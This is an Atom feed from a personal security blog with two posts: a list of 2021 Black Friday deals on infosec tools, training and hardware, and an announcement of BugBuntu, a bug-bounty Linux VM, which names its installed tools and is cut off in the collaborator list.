<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.2.1">Jekyll</generator><link href="https://humbertojunior.com.br/feed.xml" rel="self" type="application/atom+xml" /><link href="https://humbertojunior.com.br/" rel="alternate" type="text/html" /><updated>2021-11-25T15:16:38-03:00</updated><id>https://humbertojunior.com.br/feed.xml</id><title type="html">bt0’s Security Blog</title><subtitle>Just another Infosec Blog - Resources, Tutorial</subtitle><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><entry><title type="html">Black Friday Infosec Deals</title><link href="https://humbertojunior.com.br/bfriday/2021/11/23/black-friday-deals-2021.html" rel="alternate" type="text/html" title="Black Friday Infosec Deals" /><published>2021-11-23T00:00:00-03:00</published><updated>2021-11-23T00:00:00-03:00</updated><id>https://humbertojunior.com.br/bfriday/2021/11/23/black-friday-deals-2021</id><content type="html" xml:base="https://humbertojunior.com.br/bfriday/2021/11/23/black-friday-deals-2021.html">&lt;p&gt;Some deals compiled from:
&lt;a href=&quot;https://github.com/0x90n/InfoSec-Black-Friday/blob/master/README.md&quot;&gt;https://github.com/0x90n/InfoSec-Black-Friday/blob/master/README.md&lt;/a&gt; &lt;br /&gt;
Use the above link for updates&lt;/p&gt;

&lt;h1 id=&quot;black-friday-deals---2021&quot;&gt;Black Friday Deals - 2021&lt;/h1&gt;
&lt;h2 id=&quot;deals-repository&quot;&gt;&lt;em&gt;Deals Repository&lt;/em&gt;&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;http://www.gnu.org/licenses/gpl-3.0&quot;&gt;&lt;img src=&quot;https://img.shields.io/badge/License-GPL%20v3-blue.svg&quot; alt=&quot;License: GPL v3&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;infosec-black-friday-deals-2021&quot;&gt;InfoSec Black Friday Deals 2021&lt;/h1&gt;
&lt;p&gt;All the deals for InfoSec related software/tools this Black Friday / Cyber Monday, for all the hackers that saved $$$ during lockdowns.&lt;/p&gt;

&lt;p&gt;Heard of an early deal? Let’s get this rolling 🎉
The below deals have either publicly announced they’ll be doing a deal or highly expected.
    - All USD
    - All End times in UTC
    - DYOR and AYOR: I have not vetted links for legitimacy
    - Some deals use my handle for tracking - these are not referral/affiliate/commission&lt;/p&gt;

&lt;h2 id=&quot;faq&quot;&gt;FAQ&lt;/h2&gt;
&lt;h3 id=&quot;when-do-these-sales-end&quot;&gt;When do these sales end?&lt;/h3&gt;
&lt;p&gt;Most end 30th November&lt;/p&gt;

&lt;h3 id=&quot;when-will-most-of-the-dealsdiscounts-be-here&quot;&gt;When will most of the deals/discounts be here?&lt;/h3&gt;
&lt;p&gt;Most likely 27th midday for USA, 28th November for the rest of the world, check back often!&lt;/p&gt;

&lt;h3 id=&quot;can-i-add-deals-to-the-page&quot;&gt;Can I add deals to the page?&lt;/h3&gt;
&lt;p&gt;Yes, please follow formatting guidelines, provide a source and code. Has to be infosec related.&lt;/p&gt;

&lt;p&gt;refers to &lt;a href=&quot;https://github.com/0x90n/InfoSec-Black-Friday/blob/master/README.md&quot;&gt;https://github.com/0x90n/InfoSec-Black-Friday/blob/master/README.md&lt;/a&gt;
Please help updating this repo&lt;/p&gt;

&lt;h2 id=&quot;newsletters&quot;&gt;Newsletters&lt;/h2&gt;

&lt;h5 id=&quot;return-on-security&quot;&gt;Return on Security&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.returnonsecurity.com/black-friday-25&quot;&gt;https://www.returnonsecurity.com/black-friday-25&lt;/a&gt; &lt;br /&gt;
25% off the &lt;a href=&quot;https://www.returnonsecurity.com/pro-reports/&quot;&gt;Pro Membership&lt;/a&gt; for 3 months with code: black-friday-25&lt;/p&gt;

&lt;h2 id=&quot;tools&quot;&gt;Tools&lt;/h2&gt;

&lt;h5 id=&quot;securestack-devsecops-platform&quot;&gt;Securestack DevSecOps platform&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://securestack.com/black-friday-sale/&quot;&gt;https://securestack.com/black-friday-sale/&lt;/a&gt;&lt;br /&gt;
30% off and 4 months subscription with code: BLACKFRIDAY21 &lt;br /&gt;
Ends: 2nd December&lt;/p&gt;

&lt;h5 id=&quot;devutils&quot;&gt;DevUtils&lt;/h5&gt;
&lt;p&gt;Offline Toolbox with Develper/Security applications&lt;br /&gt;
&lt;a href=&quot;https://devutils.app/&quot;&gt;https://devutils.app/&lt;/a&gt;
30% off with code: BLACKFRIDAY_2021S&lt;/p&gt;

&lt;h5 id=&quot;grayhatwarfare-the-shodan-for-s3-bucketsshorteners&quot;&gt;GrayHatWarfare (the shodan for S3 buckets/shorteners)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://grayhatwarfare.com/packages&quot;&gt;https://grayhatwarfare.com/packages&lt;/a&gt;
was €300 now €160 for 1Y premium &lt;br /&gt;
was €960 now €450 for 1Y enterprise&lt;/p&gt;

&lt;h5 id=&quot;proxyman&quot;&gt;Proxyman&lt;/h5&gt;
&lt;p&gt;Web Debugging Proxy macOS app for sec/devs to capture, inspect, and manipulate HTTP(s) requests/responses &lt;br /&gt;
&lt;a href=&quot;https://proxyman.io&quot;&gt;https://proxyman.io&lt;/a&gt;
30% off with code: PROXYMAN_BLACK_FRIDAY_2021&lt;/p&gt;

&lt;h5 id=&quot;pulsedive-threat-intelligence&quot;&gt;Pulsedive Threat Intelligence&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://pulsedive.com/about/pro&quot;&gt;https://pulsedive.com/about/pro&lt;/a&gt;
&lt;a href=&quot;https://pulsedive.com/about/api&quot;&gt;https://pulsedive.com/about/api&lt;/a&gt;
Incoming deal on Pulsedive Pro or API plans released on 24th November&lt;/p&gt;

&lt;h5 id=&quot;sn1per-elite-bundle&quot;&gt;Sn1per Elite Bundle&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://sn1persecurity.com/wordpress/black-friday-sale/&quot;&gt;https://sn1persecurity.com/wordpress/black-friday-sale/&lt;/a&gt;
15% discount ($132 savings)&lt;br /&gt;
Ends: 28th November&lt;/p&gt;

&lt;h5 id=&quot;workflow86-documentautomate-security-operation-playbooks-and-business-processes&quot;&gt;Workflow86 (Document/automate security operation playbooks and business processes)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://news.ycombinator.com/item?id=29152173&quot;&gt;https://news.ycombinator.com/item?id=29152173&lt;/a&gt;
&lt;a href=&quot;https://www.workflow86.com&quot;&gt;https://www.workflow86.com&lt;/a&gt;
30% off any plan for 3 months with code: BLACKFRIDAY2021 &lt;br /&gt;
Ends: 30 November&lt;/p&gt;

&lt;h5 id=&quot;tenable&quot;&gt;Tenable&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.tenable.com/buy&quot;&gt;https://www.tenable.com/buy&lt;/a&gt;
50% off Nessus PRO with code: takehalf&lt;/p&gt;

&lt;h5 id=&quot;burp-bounty-pro-extension&quot;&gt;Burp Bounty Pro Extension&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://burpbounty.net/&quot;&gt;https://burpbounty.net/&lt;/a&gt;
&lt;a href=&quot;https://order.shareit.com/cart/add?vendorid=200287980&amp;amp;PRODUCT%5B300991779%5D=1&quot;&gt;https://order.shareit.com/cart/add?vendorid=200287980&amp;amp;PRODUCT%5B300991779%5D=1&lt;/a&gt;
20% off with code: CYBERBOUNTY&lt;/p&gt;

&lt;h2 id=&quot;courses--training&quot;&gt;Courses &amp;amp; Training&lt;/h2&gt;

&lt;h5 id=&quot;7asecurity-black-friday-sale-on-any-course&quot;&gt;7ASecurity Black friday sale on any course&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://store.7asecurity.com/&quot;&gt;https://store.7asecurity.com/&lt;/a&gt;
40% off with code: BFCM40 &lt;br /&gt;
Ends: December 1st&lt;/p&gt;

&lt;h5 id=&quot;burp-suite-certified-practitioner&quot;&gt;Burp Suite Certified Practitioner&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://portswigger.net/blog/burp-suite-certification-prices-hacked-for-black-friday&quot;&gt;https://portswigger.net/blog/burp-suite-certification-prices-hacked-for-black-friday&lt;/a&gt; &lt;br /&gt;
November 16 - November 30 2021: The certification exam is on sale for $9. &lt;br /&gt;
Purchase date - December 15 2021: If you pass your exam before 15 Dec 21, you qualify for a refund&lt;/p&gt;

&lt;h5 id=&quot;dronesec-drone-cybersec-threat-intel--counter-drone-security-training&quot;&gt;DroneSec (Drone Cybersec, Threat Intel &amp;amp; Counter-Drone Security Training)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://training.dronesec.com/p/Black-Friday-2021&quot;&gt;https://training.dronesec.com/p/Black-Friday-2021&lt;/a&gt;
67% off with code: BFMETAVERSE &lt;br /&gt;
Ends: 30th November&lt;/p&gt;

&lt;h5 id=&quot;letsdefend---blue-team-training&quot;&gt;LetsDefend - Blue Team Training&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://letsdefend.io/&quot;&gt;https://letsdefend.io/&lt;/a&gt;&lt;br /&gt;
50% off code: BLCKFRDY &lt;br /&gt;
Ends: 30th November&lt;/p&gt;

&lt;h5 id=&quot;the-cyber-plumbers-lab-guide-and-access&quot;&gt;The Cyber Plumber’s Lab Guide and Access&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://opsdisk.gumroad.com/l/cphlab/blackfriday2021&quot;&gt;https://opsdisk.gumroad.com/l/cphlab/blackfriday2021&lt;/a&gt;&lt;br /&gt;
(1) 50% off + free handbook (2) 75% off for students&lt;/p&gt;

&lt;h5 id=&quot;eric-daiz-udemy-hacking-courses&quot;&gt;Eric Daiz (Udemy Hacking Courses)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.udemy.com/user/eric-daiz/&quot;&gt;https://www.udemy.com/user/eric-daiz/&lt;/a&gt;&lt;br /&gt;
50% off with code: 50OFFNOVEMBER&lt;/p&gt;

&lt;h5 id=&quot;udemy&quot;&gt;Udemy&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.udemy.com/&quot;&gt;https://www.udemy.com/&lt;/a&gt;&lt;br /&gt;
Most courses $10.99 &lt;br /&gt;
Ends: 26th November&lt;/p&gt;

&lt;h5 id=&quot;pluralsight&quot;&gt;PluralSight&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.pluralsight.com/offer/2021/bf-cm-40-off&quot;&gt;https://www.pluralsight.com/offer/2021/bf-cm-40-off&lt;/a&gt;&lt;br /&gt;
40% discount &lt;br /&gt;
Ends: 29th November&lt;/p&gt;

&lt;h5 id=&quot;robin-dreeke-social-engineering-training&quot;&gt;Robin Dreeke (Social Engineering Training)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.peopleformula.com/online-training-overview&quot;&gt;https://www.peopleformula.com/online-training-overview&lt;/a&gt;&lt;br /&gt;
25% off all courses with code: infosec25&lt;/p&gt;

&lt;h5 id=&quot;ine-elearnsecurity-courses&quot;&gt;INE (ELearnSecurity Courses)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://info.ine.com/black-friday-2021/&quot;&gt;https://info.ine.com/black-friday-2021/&lt;/a&gt;&lt;br /&gt;
Premium Access Pass for $499 + free eLearnSecurity certification voucher &lt;br /&gt;
Premium for $599 + Pentester Academy access + free eLearnSecurity certification voucher&lt;/p&gt;

&lt;h5 id=&quot;osintion-osint-training&quot;&gt;OSINTion (OSINT Training)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.theosintion.com/courses/store/&quot;&gt;https://www.theosintion.com/courses/store/&lt;/a&gt;&lt;br /&gt;
25% off courses with code: BLACKFRIDAY2021&lt;br /&gt;
15% off bundles with code: BUNDLES2021BLACKFRIDAY&lt;/p&gt;

&lt;h5 id=&quot;security-blue-team&quot;&gt;Security Blue Team&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://securityblue.team/#black-friday&quot;&gt;https://securityblue.team/#black-friday&lt;/a&gt;&lt;br /&gt;
25% off BTL1 certification &amp;amp; training (£399 –&amp;gt; £299) &lt;br /&gt;
20% off BTL2 certification &amp;amp; training (£1999 –&amp;gt; £1599) &lt;br /&gt;
33% off Blue Team Labs Pro subscription (£15/month –&amp;gt; £10/month)
Ends: 3rd December&lt;/p&gt;

&lt;h5 id=&quot;pensterlab-black-friday-sale&quot;&gt;Pensterlab Black friday sale&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://pentesterlab.com/pro&quot;&gt;https://pentesterlab.com/pro&lt;/a&gt;&lt;br /&gt;
27% off one year subscription &lt;br /&gt;
(1) $146 instead of $199 &lt;br /&gt;
(2) 29.99 instead of 34.99 for students&lt;/p&gt;

&lt;h5 id=&quot;the-cyber-mentor-tcm-security-courses&quot;&gt;The Cyber Mentor (TCM) Security Courses&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://academy.tcm-sec.com/&quot;&gt;https://academy.tcm-sec.com/&lt;/a&gt;&lt;br /&gt;
(1) 50% off all courses (2) 20% off PNPT Certification&lt;/p&gt;

&lt;h5 id=&quot;practical-devsecops&quot;&gt;Practical DevSecOps&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.practical-devsecops.com/black-friday/&quot;&gt;https://www.practical-devsecops.com/black-friday/&lt;/a&gt;&lt;br /&gt;
15% off all courses
Ends: 26th November&lt;/p&gt;

&lt;h5 id=&quot;isaca-infosecgrc-training&quot;&gt;ISACA InfoSec/GRC Training&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.isaca.org/go/flash&quot;&gt;https://www.isaca.org/go/flash&lt;/a&gt;&lt;br /&gt;
15% off CISA/CISM/CRISC/CGEIT/CDPSE training &amp;amp; cert with code: FLASHSALE15 &lt;br /&gt;
Ends: 15th December&lt;/p&gt;

&lt;h5 id=&quot;international-cybersecurity-institute-icsi&quot;&gt;International Cybersecurity Institute ICSI&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.icsi.co.uk/&quot;&gt;https://www.icsi.co.uk/&lt;/a&gt;
50% off courses releasing 22nd November &lt;br /&gt;
Ends: 29th November&lt;/p&gt;

&lt;h5 id=&quot;comptia-courses&quot;&gt;CompTIA Courses&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.comptia.org/content/lp/black-friday-preview&quot;&gt;https://www.comptia.org/content/lp/black-friday-preview&lt;/a&gt;
Unknown discount releasing shortly&lt;/p&gt;

&lt;h5 id=&quot;riot-phishing-simulation-training--cybersecurity-awareness-on-slack&quot;&gt;Riot (Phishing simulation training + cybersecurity awareness on Slack)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.tryriot.com&quot;&gt;https://www.tryriot.com&lt;/a&gt; 
20% off everything with the &lt;strong&gt;BLACKFRIDAY&lt;/strong&gt; code &lt;br /&gt;
Ends: December 1st&lt;/p&gt;

&lt;h2 id=&quot;mini-course-bundles&quot;&gt;Mini Course Bundles:&lt;/h2&gt;

&lt;h5 id=&quot;a-to-z-cyber-security-training-bundle-12-courses&quot;&gt;A to Z Cyber Security Training Bundle (12 courses)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://store.boingboing.net/sales/the-a-to-z-cyber-security-it-certification-training-bundle&quot;&gt;https://store.boingboing.net/sales/the-a-to-z-cyber-security-it-certification-training-bundle&lt;/a&gt; $19.97 applied to cart&lt;/p&gt;

&lt;h5 id=&quot;ultimate-cybersecurity-analyst-prep-bundle-8-courses&quot;&gt;Ultimate Cybersecurity Analyst Prep Bundle (8 courses)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://deals.bleepingcomputer.com/sales/the-2022-ultimate-cybersecurity-analyst-certification-preparation-bundle&quot;&gt;https://deals.bleepingcomputer.com/sales/the-2022-ultimate-cybersecurity-analyst-certification-preparation-bundle&lt;/a&gt; $29.99 applied to cart&lt;/p&gt;

&lt;h2 id=&quot;hardware&quot;&gt;Hardware:&lt;/h2&gt;

&lt;h5 id=&quot;hak5-hacking-hardware-for-pentesters&quot;&gt;Hak5 hacking hardware for pentesters&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://shop.hak5.org/&quot;&gt;https://shop.hak5.org/&lt;/a&gt;
Huge discounts + free gear&lt;/p&gt;

&lt;h5 id=&quot;pcwrt-secure-wifi-router&quot;&gt;pcWRT Secure WiFi Router&lt;/h5&gt;
&lt;p&gt;Router with all privacy tools builtin: VLAN, VPN, Ad Block, DoH, Access Control, Monitoring &lt;br /&gt;
&lt;a href=&quot;https://www.pcwrt.com/&quot;&gt;https://www.pcwrt.com/&lt;/a&gt;&lt;br /&gt;
25% off with code: GITHUBBF21&lt;/p&gt;

&lt;h5 id=&quot;ifixit-hardware-and-electronics-equipment&quot;&gt;ifixit (Hardware and electronics equipment)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.ifixit.com/black-friday-holiday&quot;&gt;https://www.ifixit.com/black-friday-holiday&lt;/a&gt;&lt;br /&gt;
Multiple discounts applied to cart&lt;/p&gt;

&lt;h5 id=&quot;yubicoyubikey&quot;&gt;Yubico/Yubikey&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.yubico.com/au/store/black-friday/&quot;&gt;https://www.yubico.com/au/store/black-friday/&lt;/a&gt;&lt;br /&gt;
Various deals released 22nd November&lt;/p&gt;

&lt;h2 id=&quot;clothing&quot;&gt;Clothing:&lt;/h2&gt;

&lt;h5 id=&quot;miscreants-cyber--security-clothing&quot;&gt;Miscreants Cyber &amp;amp; Security clothing&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://shopmiscreants.com/&quot;&gt;https://shopmiscreants.com/&lt;/a&gt;&lt;br /&gt;
25% off with code: 0x90n&lt;/p&gt;

&lt;h2 id=&quot;books&quot;&gt;Books:&lt;/h2&gt;

&lt;h5 id=&quot;apress-books&quot;&gt;Apress Books&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.apress.com/us/shop/cybermonday-sale&quot;&gt;https://www.apress.com/us/shop/cybermonday-sale&lt;/a&gt;&lt;br /&gt;
All print books $9.99 and eBooks $6.99 discount applied to cart&lt;/p&gt;

&lt;h5 id=&quot;humble-bundle-check-back-often-for-infosec-books---currently-only-games&quot;&gt;Humble Bundle (Check back often for InfoSec books - currently only games)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.humblebundle.com/store/promo/black-friday-sale-2021/&quot;&gt;https://www.humblebundle.com/store/promo/black-friday-sale-2021/&lt;/a&gt;&lt;br /&gt;
Up to 80% off applied to cart&lt;/p&gt;

&lt;h5 id=&quot;nostarch-press&quot;&gt;NoStarch Press&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://nostarch.com/blog/2021-holiday-gift-guide&quot;&gt;https://nostarch.com/blog/2021-holiday-gift-guide&lt;/a&gt;&lt;br /&gt;
Various deals on books applied to cart&lt;/p&gt;

&lt;h2 id=&quot;services&quot;&gt;Services:&lt;/h2&gt;

&lt;h5 id=&quot;nordvpn&quot;&gt;NordVPN&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://nordvpn.com/offer/&quot;&gt;https://nordvpn.com/offer/&lt;/a&gt;&lt;br /&gt;
72% discount applied to cart&lt;/p&gt;

&lt;h5 id=&quot;surfshark-vpn&quot;&gt;Surfshark VPN&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://surfshark.com/deals&quot;&gt;https://surfshark.com/deals&lt;/a&gt;&lt;br /&gt;
83% off + 3 months free applied to cart&lt;/p&gt;

&lt;h5 id=&quot;purevpn&quot;&gt;PureVPN&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.purevpn.com/best-discount-offer?aff=41859&quot;&gt;https://www.purevpn.com/best-discount-offer?aff=41859&lt;/a&gt;&lt;br /&gt;
use coupon code: SAVEMORE, 5-year plan 67.96 USD&lt;/p&gt;

&lt;h5 id=&quot;lowendbox---itcloudnetworking-sytems&quot;&gt;Lowendbox - IT/Cloud/Networking sytems&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://lowendbox.com/blog/what-is-black-friday/&quot;&gt;https://lowendbox.com/blog/what-is-black-friday/&lt;/a&gt;&lt;br /&gt;
Variety of deals releasing 24th November&lt;/p&gt;

&lt;h5 id=&quot;simplelogin&quot;&gt;SimpleLogin&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://simplelogin.io/pricing/&quot;&gt;https://simplelogin.io/pricing/&lt;/a&gt; $20 first year applied to cart
Ends: 30th November&lt;/p&gt;

&lt;h5 id=&quot;eset-anti-virus&quot;&gt;ESET Anti-Virus&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://www.eset.com/us/cyber-weekend-2021/&quot;&gt;https://www.eset.com/us/cyber-weekend-2021/&lt;/a&gt;&lt;br /&gt;
35% off products applied to cart&lt;/p&gt;

&lt;h5 id=&quot;murus-and-vallum-macos-firewall&quot;&gt;Murus and Vallum (macOS Firewall)&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://murusfirewall.com/&quot;&gt;https://murusfirewall.com/&lt;/a&gt;&lt;br /&gt;
50% off applied to cart&lt;/p&gt;

&lt;h5 id=&quot;malwarebytes&quot;&gt;MalwareBytes&lt;/h5&gt;
&lt;p&gt;&lt;a href=&quot;https://try.malwarebytes.com/&quot;&gt;https://try.malwarebytes.com/&lt;/a&gt;
60% off Malwarebytes Premium, 50% OFF Malwarebytes Premium + Privacy &lt;br /&gt;
&lt;a href=&quot;https://try.malwarebytes.com/back-to-business/&quot;&gt;https://try.malwarebytes.com/back-to-business/&lt;/a&gt;&lt;br /&gt;
25% off Endpoint, Detection and Response products&lt;/p&gt;

&lt;h2 id=&quot;credits&quot;&gt;Credits&lt;/h2&gt;
&lt;p&gt;If you’d like to DM me a deal rather than submitting a PR: @securitymeta_&lt;/p&gt;

&lt;p&gt;Thanks to 0ldMate referring me to @Infosec_Taylor who has a fantastic twitter thread as well, adding in some of those deals here!
Also thanks to webyeti, grabbed some deals from: &lt;a href=&quot;https://www.webyeti.ninja/blog/hackerblkfri&quot;&gt;https://www.webyeti.ninja/blog/hackerblkfri&lt;/a&gt; - more non-infosec deals in there too.
Shoutout to some discounts grabbed from Dutchosintguy, @gabsmashh
Thanks to those that have sent pull requests, and @reV_sh_ on twitter, among others.&lt;/p&gt;

&lt;p&gt;Thanks to those who credited and helped spread the word!
&lt;a href=&quot;https://github.com/instadoodledavid/Infosec-Deals-2020&quot;&gt;https://github.com/instadoodledavid/Infosec-Deals-2020&lt;/a&gt;
&lt;a href=&quot;https://github.com/Securityinfos/Black-Friday-Deals&quot;&gt;https://github.com/Securityinfos/Black-Friday-Deals&lt;/a&gt;
&lt;a href=&quot;https://github.com/Dutchosintguy/Blackfriday-Deals-2020&quot;&gt;https://github.com/Dutchosintguy/Blackfriday-Deals-2020&lt;/a&gt;&lt;/p&gt;

&lt;h2 id=&quot;discoverability&quot;&gt;Discoverability&lt;/h2&gt;
&lt;p&gt;infosec black friday, information security black friday, cybersec black friday, cyber security black friday, netsec black friday, hacking black friday
infosec cyber monday, information security cyber monday, cybersec cyber monday, cyber security cyber monday, netsec cyber monday, hacking cyber monday
infosec deals, coupons, discounts, sales, pentest, penetration test, red team, blue team, purple team, thanksgiving&lt;/p&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="bfriday" /><summary type="html">Some deals compiled from: https://github.com/0x90n/InfoSec-Black-Friday/blob/master/README.md Use the above link for updates</summary></entry><entry><title type="html">BugBuntu Linux</title><link href="https://humbertojunior.com.br/infosec/pentest/bugbounty/tools/2021/11/08/bugbuntu-linux.html" rel="alternate" type="text/html" title="BugBuntu Linux" /><published>2021-11-08T00:00:00-03:00</published><updated>2021-11-08T00:00:00-03:00</updated><id>https://humbertojunior.com.br/infosec/pentest/bugbounty/tools/2021/11/08/bugbuntu-linux</id><content type="html" xml:base="https://humbertojunior.com.br/infosec/pentest/bugbounty/tools/2021/11/08/bugbuntu-linux.html">&lt;p&gt;Hello, this is our first alphabeta test version of BugBuntu&lt;/p&gt;

&lt;p&gt;This little project is based on Tips from King of Bug Bounty repository&lt;/p&gt;

&lt;p&gt;BugBuntu is a customized distro based on Ubuntu 18.04 and focused on Bug Bounty tools.&lt;/p&gt;

&lt;h1 id=&quot;bugbuntu-linux-v012&quot;&gt;BugBuntu Linux v0.1.2&lt;/h1&gt;

&lt;p&gt;Some installed tools:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Amass&lt;/li&gt;
  &lt;li&gt;Anew&lt;/li&gt;
  &lt;li&gt;Anti-burl&lt;/li&gt;
  &lt;li&gt;Assetfinder&lt;/li&gt;
  &lt;li&gt;CF-check&lt;/li&gt;
  &lt;li&gt;Chaos&lt;/li&gt;
  &lt;li&gt;Dalfox&lt;/li&gt;
  &lt;li&gt;DNSgen&lt;/li&gt;
  &lt;li&gt;Filter-resolved&lt;/li&gt;
  &lt;li&gt;Findomain&lt;/li&gt;
  &lt;li&gt;Fuff&lt;/li&gt;
  &lt;li&gt;Gargs&lt;/li&gt;
  &lt;li&gt;Gau&lt;/li&gt;
  &lt;li&gt;Gf&lt;/li&gt;
  &lt;li&gt;Github-Search&lt;/li&gt;
  &lt;li&gt;Gospider&lt;/li&gt;
  &lt;li&gt;Gowitness&lt;/li&gt;
  &lt;li&gt;Hakrawler&lt;/li&gt;
  &lt;li&gt;HakrevDNS&lt;/li&gt;
  &lt;li&gt;Haktldextract&lt;/li&gt;
  &lt;li&gt;Html-tool&lt;/li&gt;
  &lt;li&gt;Httpx&lt;/li&gt;
  &lt;li&gt;Jaeles&lt;/li&gt;
  &lt;li&gt;Jsubfinder&lt;/li&gt;
  &lt;li&gt;Kxss&lt;/li&gt;
  &lt;li&gt;LinkFinder&lt;/li&gt;
  &lt;li&gt;Metabigor&lt;/li&gt;
  &lt;li&gt;MassDNS&lt;/li&gt;
  &lt;li&gt;Naabu&lt;/li&gt;
  &lt;li&gt;Qsreplace&lt;/li&gt;
  &lt;li&gt;Rush&lt;/li&gt;
  &lt;li&gt;SecretFinder&lt;/li&gt;
  &lt;li&gt;ShuffleDNS&lt;/li&gt;
  &lt;li&gt;SQLMap&lt;/li&gt;
  &lt;li&gt;Subfinder&lt;/li&gt;
  &lt;li&gt;SubJS&lt;/li&gt;
  &lt;li&gt;Unew&lt;/li&gt;
  &lt;li&gt;Unfurl&lt;/li&gt;
  &lt;li&gt;WaybackURLs&lt;/li&gt;
  &lt;li&gt;Notify&lt;/li&gt;
  &lt;li&gt;Goop&lt;/li&gt;
  &lt;li&gt;Tojson&lt;/li&gt;
  &lt;li&gt;getJS&lt;/li&gt;
  &lt;li&gt;x8&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Tools Installed:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;nuclei&lt;/li&gt;
  &lt;li&gt;InurlBR Scanner (New version by @MrCl0wnLab)&lt;/li&gt;
  &lt;li&gt;jexboss&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;screenshots&quot;&gt;Screenshots:&lt;/h2&gt;

&lt;p&gt;&lt;img src=&quot;https://imgur.com/IvTEAiX.jpg&quot; alt=&quot;BugBuntu&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://imgur.com/6cL505V.jpg&quot; alt=&quot;BugBuntu&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;you-can-download-the-ova-for-virtualbox-using-the-link-below&quot;&gt;You can download the OVA (For Virtualbox) using the link below:&lt;/h2&gt;

&lt;p&gt;Via Sourceforge:&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://sourceforge.net/projects/bugbuntu/&quot;&gt;&lt;img src=&quot;https://a.fsdn.com/con/app/sf-download-button&quot; alt=&quot;Download BugBuntu&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://sourceforge.net/projects/bugbuntu/&quot;&gt;&lt;img src=&quot;https://img.shields.io/sourceforge/dm/bugbuntu.svg&quot; alt=&quot;Download BugBuntu&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Default login and pwd are bugbuntu:bugbuntu&lt;/p&gt;

&lt;h2 id=&quot;collaborators&quot;&gt;Collaborators&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://github.com/halencarjunior&quot;&gt;bt0&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://github.com/MrCl0wnLab&quot;&gt;MrCl0wn&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://github.com/KingOfBugbounty&quot;&gt;OFJAAAH&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
